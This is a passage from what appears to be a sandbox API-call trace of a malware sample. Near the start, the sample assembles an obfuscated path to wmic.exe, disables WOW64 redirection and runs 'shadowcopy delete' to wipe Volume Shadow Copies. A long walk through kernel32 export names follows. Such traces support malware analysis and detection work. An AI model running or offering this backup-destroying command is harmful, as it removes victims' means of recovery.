lpString1="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\system32\\m\\d\\taj\\..\\", lpString2="..\\" | out: lpString1="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\system32\\m\\d\\taj\\..\\..\\") returned="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\system32\\m\\d\\taj\\..\\..\\" [0179.100] lstrcatW (in: lpString1="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\system32\\m\\d\\taj\\..\\..\\", lpString2="..\\" | out: lpString1="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\system32\\m\\d\\taj\\..\\..\\..\\") returned="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\system32\\m\\d\\taj\\..\\..\\..\\" [0179.100] lstrcatW (in: lpString1="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\system32\\m\\d\\taj\\..\\..\\..\\wbem\\pyeqp\\", lpString2="..\\" | out: lpString1="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\system32\\m\\d\\taj\\..\\..\\..\\wbem\\pyeqp\\..\\") returned="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\system32\\m\\d\\taj\\..\\..\\..\\wbem\\pyeqp\\..\\" [0179.101] wsprintfW (in: param_1=0x6b0000, param_2="\"%s\" shadowcopy delete" | out: param_1="\"C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\system32\\m\\d\\taj\\..\\..\\..\\wbem\\pyeqp\\..\\wmic.exe\" shadowcopy delete") returned 113 [0179.101] GetModuleHandleW (lpModuleName="kernel32") returned 0x77110000 [0179.101] GetProcAddress (hModule=0x77110000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x7713d650 [0179.101] Wow64DisableWow64FsRedirection (in: OldValue=0x239f92c | out: OldValue=0x239f92c*=0x0) returned 1 [0179.101] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\system32\\m\\d\\taj\\..\\..\\..\\wbem\\pyeqp\\..\\wmic.exe\" shadowcopy delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x239f8e8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x239f968 | out: lpCommandLine="\"C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\system32\\m\\d\\taj\\..\\..\\..\\wbem\\pyeqp\\..\\wmic.exe\" shadowcopy delete", lpProcessInformation=0x239f968*(hProcess=0x230, hThread=0x22c, dwProcessId=0x334, dwThreadId=0x514)) returned 1 [0179.118] CloseHandle (hObject=0x230) returned 1 [0179.118] CloseHandle (hObject=0x22c) returned 1 [0179.118] GetModuleHandleW (lpModuleName="kernel32") returned 0x77110000 [0179.119] GetProcAddress (hModule=0x77110000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x7713d668 [0179.119] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0179.119] VirtualFree (lpAddress=0x6b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.119] VirtualFree (lpAddress=0x6a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.119] lstrlenA (lpString="kernel32.dll") returned 12 [0179.119] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0179.119] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0179.119] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0179.119] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0179.119] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0179.119] lstrcpyA (in: lpString1=0x239f0e8, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0179.119] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0179.120] lstrlenA (lpString="ADDATOMA") returned 8 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0179.120] lstrlenA (lpString="ADDATOMW") returned 8 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0179.120] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0179.120] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0179.120] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0179.120] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0179.120] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0179.120] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0179.120] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0179.120] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0179.120] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0179.120] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0179.120] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0179.120] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0179.120] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0179.120] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0179.120] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0179.120] lstrcpyA (in: lpString1=0x239f0e8, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0179.120] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0179.121] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0179.121] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0179.121] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0179.121] lstrlenA (lpString="BACKUPREAD") returned 10 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0179.121] lstrlenA (lpString="BACKUPSEEK") returned 10 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0179.121] lstrlenA (lpString="BACKUPWRITE") returned 11 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0179.121] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0179.121] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0179.121] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0179.121] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0179.121] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0179.121] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0179.121] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0179.121] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0179.121] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0179.121] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0179.121] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0179.121] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0179.121] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0179.122] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0179.122] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0179.122] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0179.122] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0179.122] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0179.122] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0179.122] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0179.122] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0179.122] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0179.122] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0179.122] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0179.122] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0179.122] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0179.122] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0179.122] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0179.122] lstrlenA (lpString="BEEP") returned 4 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0179.122] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0179.122] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0179.122] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0179.122] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0179.123] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0179.123] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0179.123] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0179.123] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0179.123] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0179.123] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0179.123] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0179.123] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0179.123] lstrlenA (lpString="CANCELIO") returned 8 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0179.123] lstrlenA (lpString="CANCELIOEX") returned 10 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0179.123] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0179.123] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0179.123] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0179.123] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0179.123] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0179.123] lstrlenA (lpString="CHECKELEVATION") returned 14 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0179.123] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0179.123] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0179.123] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0179.124] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0179.124] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0179.124] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0179.124] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0179.124] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0179.124] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0179.124] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0179.124] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0179.124] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0179.124] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0179.124] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0179.124] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0179.124] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0179.124] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0179.124] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0179.124] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0179.124] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0179.124] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0179.124] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0179.124] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0179.125] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0179.125] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0179.125] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0179.125] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0179.125] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0179.125] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0179.125] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0179.125] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0179.125] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0179.125] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0179.125] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0179.125] lstrcpyA (in: 